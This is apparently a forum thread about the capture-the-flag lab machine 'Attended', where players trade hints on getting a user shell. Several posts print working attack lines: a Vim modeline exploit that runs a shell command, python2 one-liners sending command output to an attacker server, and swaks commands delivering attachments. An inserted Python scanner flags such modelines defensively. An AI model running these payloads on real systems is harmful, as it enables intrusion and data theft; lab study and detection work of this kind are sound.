TUTORIAL ATTENDED [DISCUSSION]
by 0xvijay - December 20, 2020 at 06:26 AM
#37
(January 11, 2021 at 05:25 PM)0xvijay Wrote:
(January 11, 2021 at 03:22 PM)Hum12sa Wrote: Anyone would like to team up for root?

tell steps for user


thankyou

DM Me

(January 12, 2021 at 07:09 AM)EddieFlagg Wrote: I haven't been able to get user shell, just sending myself some pings from the target or a reverse shell on port 25 that dies instantly.

Can anyone post steps to user? happy to give you my coins if you wanna hide it.

From what I can tell, we need to read the socket in tmp and connect using that without a password. Not sure how to read it.

Ever heard of data exfiltration? Either through DNS or ICMP packets or raw HTTP requests?
Reply
#38
(January 12, 2021 at 09:17 PM)Hum12sa Wrote:
(January 11, 2021 at 05:25 PM)0xvijay Wrote:
(January 11, 2021 at 03:22 PM)Hum12sa Wrote: Anyone would like to team up for root?

tell steps for user


thankyou

DM Me

(January 12, 2021 at 07:09 AM)EddieFlagg Wrote: I haven't been able to get user shell, just sending myself some pings from the target or a reverse shell on port 25 that dies instantly.

Can anyone post steps to user? happy to give you my coins if you wanna hide it.

From what I can tell, we need to read the socket in tmp and connect using that without a password. Not sure how to read it.

Ever heard of data exfiltration? Either through DNS or ICMP packets or raw HTTP requests?

Yeah, I tried for around 4 hours to get data out using the -p flag. I could get it working locally in a test, but not on the remote target. I assume it's that I'm trying to use commands on the target that are not there to convert the pattern to hex. I think I'm getting closer
Reply
#39
(January 12, 2021 at 09:46 PM)EddieFlagg Wrote:
(January 12, 2021 at 09:17 PM)Hum12sa Wrote:
(January 11, 2021 at 05:25 PM)0xvijay Wrote:
(January 11, 2021 at 03:22 PM)Hum12sa Wrote: Anyone would like to team up for root?

tell steps for user


thankyou

DM Me

(January 12, 2021 at 07:09 AM)EddieFlagg Wrote: I haven't been able to get user shell, just sending myself some pings from the target or a reverse shell on port 25 that dies instantly.

Can anyone post steps to user? happy to give you my coins if you wanna hide it.

From what I can tell, we need to read the socket in tmp and connect using that without a password. Not sure how to read it.

Ever heard of data exfiltration? Either through DNS or ICMP packets or raw HTTP requests?

Yeah, I tried for around 4 hours to get data out using the -p flag. I could get it working locally in a test, but not on the remote target. I assume it's that I'm trying to use commands on the target that are not there to convert the pattern to hex. I think I'm getting closer

Same here, but did you try using some script or just ping? With a script in bash I can send files on localhost; I don't know if the same commands work on Attended. If you can read files, how do you do that?
Reply
#40
I have not tried the ping, I will give it a shot. thanks
Reply
#41
Bumping this to the front page.
Reply
#42
You can use python to exfiltrate data as well: python2 -c "import requests; requests.get('http://<urserver>/')" this works. MAKE SURE TO USE python2, not python.
Reply
#43
Did anybody get root yet? I am having a hard time figuring it out.
Reply
#44
I'm in the same boat; I'm not that good with pwn.
Reply
#45
(January 21, 2021 at 03:35 AM)xxxyz Wrote: I'm in the same boat; I'm not that good with pwn.

Any nudges to root? Stuck on that part.
Reply
#46
Hello guys..
a strange thing happens to me with this shit box if I attach this:
:!python2 -c "import requests; requests.get('http://10.10.x.x/x')"||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt=" ---> Work

but if I attach this:
:!python2 -c "import base64; import requests; import os;import subprocess; requests.get('http://10.10.x.x/'+base64.b64encode(subprocess.check_output('id && pwd', shell=True)))"||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt="
Doesn't work ... but I tried it locally and it works perfectly ... Fuck!!!
Reply
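Added example, not part of any post in this thread: a defender-side check for the kind of attachment discussed above, flagging Vim modelines that set expression-evaluating options before a file is opened in an editor. The function names, the option list and the constructed samples are assumptions for illustration; the default window of 5 matches Vim's default 'modelines' value.

```python
import re

# Options whose value Vim evaluates as an expression (long and short names).
EXPR_OPTIONS = {"foldexpr", "fde", "foldtext", "fdt", "indentexpr", "inde",
                "formatexpr", "fex", "includeexpr", "inex"}
START = re.compile(r"(?:^|\s)(?:vi|ex|[vV]im(?:[<=>]?\d+)?):\s*")
SET_FORM = re.compile(r"set?\s+")
TOKEN = re.compile(r"(?:\\.|[^\s:\\])+")  # split on unescaped ':' / whitespace
UNESCAPED_COLON = re.compile(r"(?<!\\):")

# Constructed samples: the shell command is a harmless placeholder.
SUSPICIOUS = (r':!echo constructed-sample ||" vi:fen:fdm=expr:'
              r'fde=assert_fails("source\!\ \%"):fdl=0:fdt="')
BENIGN = "print('hello')\n# vim: set ts=4 sw=4 et:\n"


def modeline_options(line):
    """Return [(name, value)] for the options of a modeline on this line."""
    m = START.search(line)
    if not m:
        return []
    rest = line[m.end():]
    s = SET_FORM.match(rest)
    if s:  # "set opts:" form ends at the first unescaped ':'
        rest = UNESCAPED_COLON.split(rest[s.end():], maxsplit=1)[0]
    opts = []
    for tok in TOKEN.findall(rest):
        name, _, value = tok.partition("=")
        opts.append((name, value))
    return opts


def scan_attachment(text, window=5):
    """Flag expression options in the lines Vim inspects for modelines."""
    lines = text.splitlines()
    idx = sorted(set(range(min(window, len(lines)))) |
                 set(range(max(0, len(lines) - window), len(lines))))
    findings = []
    for i in idx:
        for name, value in modeline_options(lines[i]):
            if name in EXPR_OPTIONS and value:
                findings.append((i + 1, name, value))
    return findings
```

On hosts where untrusted files are opened, `set nomodeline` in the vimrc turns modeline processing off entirely, which removes the need for this kind of filtering.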
#47
(December 27, 2020 at 10:12 PM)kalihackboy Wrote: Yeah, I've gotten the following 2 responses using swaks:

swaks --to [email protected] --from [email protected] -s 10.10.10.221:25
swaks --to [email protected] --from [email protected] --attach shell.py -s 10.10.10.221:25

1st:
hi mate, could you please double check your attachment? looks like you forgot to actually attach anything :)
p.s.: i also installed a basic py2 env on gw so you can PoC quickly my new outbound traffic restrictions. i think it should stop any non RFC compliant connection.

2nd:
thanks dude, i'm currently out of the office but will SSH into the box immediately and open your attachment with vim to verify its syntax.
if everything is fine, you will find your config file within a few minutes in the /home/shared folder.
test it ASAP and let me know if you still face that weird issue.

Stuck at this point on payload to deliver for shell. Was looking into Vim exploits based on the email & signature but no success with that yet.
can you pass me your exploit?
Reply
#48
bumping for updates - trying to unstall my progress
Reply
